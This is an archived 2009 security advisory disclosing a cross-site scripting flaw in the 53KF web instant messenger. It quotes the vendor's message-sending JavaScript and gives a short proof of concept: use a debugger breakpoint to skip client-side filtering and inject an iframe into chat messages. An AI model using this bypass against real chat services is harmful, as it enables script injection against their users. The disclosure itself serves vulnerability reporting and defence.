53KF Web Instant Messenger Cross Site Scripting

2009-01-21T00:00:00
ID PACKETSTORM:74151
Type packetstorm
Reporter xisigr
Modified 2009-01-21T00:00:00

Description

                                        
                                            `Application: 53KF Web IM  
Vendor: www.53kf.com  
Corporation: LiuDu, Inc.  
Version: Latest: (19 JAN 2009) - Home Edition, Enterprise & Professional  
Description: 53KF Web IM 2009 Cross-Site Scripting Vulnerabilities  
  
Background:  
==============  
53KF is a web-based group chat tool that lets invite a client,  
colleague, or vendor to chat, and collaborate.More than 220,000  
websites in the use of 53KF.  
  
Vulnerability:  
==============  
They do not properly sanitize the potentially malicious input content  
to be rendered and, as a result, an attacker might provide malicious  
HTML content as part of an IM message. There is a client-side only  
input validation.  
  
Exploit:  
==============  
  
156function sendmsg() {  
157 try{textCounter(document.getElementById("input1"),1000)}catch(e){}  
158 msg=document.getElementById("input1").value;  
159 if (msg.trim()=="") {  
160 return;  
161 }  
162 msg=UBBEncode(msg);  
163 document.getElementById("input1").value="";  
164 display_msg("<font color=\"#666666\">"+infos[13]+":  
"+getTime2()+"</font><br>  "+UBBCode(msg.trim()));  
165 try{msg=msgFilter(msg);}catch(e){}  
166 if(usezzdy=="1"){  
167 var rmsg=sendtext(msg);  
168 display_msg("<font  
color=\"#666666\">"+infos[57]+":</font><br>  <font  
color=\"#0000CE\">"+rmsg+"</font>");  
169 }else{  
170 if (typeof(rec_stat)!="undefined" && rec_stat==1){  
171 push_info("post","REC",mytempid,"11",UBBCode(msg.trim()),getTime());  
172 display_msg("<font  
color=\"#666666\">"+infos[29]+":</font><br>  <font  
color=\"#0000CE\">"+UBBCode(UBBEncode(lword_prompt))+"</font>");  
173 }  
174 else{  
175 qstmsg(UBBCode(msg.trim()));  
176 }  
177 }  
178 if (talk_fee_type==1)  
179 {  
180 talk_fee_type=0;  
181 url="http://www.53kf.cn/v5_talk.php?talk_fee_type=1&arg="+arg+"&style="+style;  
182 rpc(url);  
183 }  
184  
185 if(istalktype==1)  
186 {  
187 istalktype=0;  
188 url="http://www.53kf.cn/istalk.php?companyid="+company_id+"&istalk=1";  
189 rpc(url);  
190 }  
191}  
  
SET BREAKPOINT(firebug, etc) AT 164TH LINE, AND SET NEW VALUE:  
msg = "<iframe width=800 height=600 src='httP://WWW.g.cn'></iframe>"  
  
=========================  
xisigr[topsec]  
xisigr@gmail.com  
  
  
--  
-----------------------------------------------------------------  
NAME:xushaopei(xsp)  
ORG:Heart[T.P.S][F.S.T][J.I.C]  
QQ:9634989  
EMAIL:xisigr@gmail.com  
BLOG:http://www.hackheart.com  
-----------------------------------------------------------------  
`